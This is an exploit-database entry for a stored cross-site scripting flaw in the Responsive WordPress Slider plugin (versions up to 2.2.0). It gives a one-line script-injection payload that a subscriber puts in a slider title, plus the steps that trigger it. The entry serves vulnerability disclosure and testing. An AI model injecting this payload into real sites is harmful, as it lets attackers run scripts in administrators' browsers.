Sploitus

Exploit for Responsive WordPress Slider <= 2.2.0 - Subscriber+ Stored Cross-Site Scripting

wpexploit Β· 2021-09-21

Exploit Code

MARKDOWN6 lines
## https://sploitus.com/exploit?id=WPEX-ID:4A2DDDFC-6CE2-4EDD-AAAA-4C130A9356D0
As a subscriber, create a Slider with the following payload in the Slider Title: "><script>alert(/XSS/)</script>

Then view the Sliders list or Edit the slider to trigger the XSS

https://www.youtube.com/watch?v=8oHr_PE2eZ8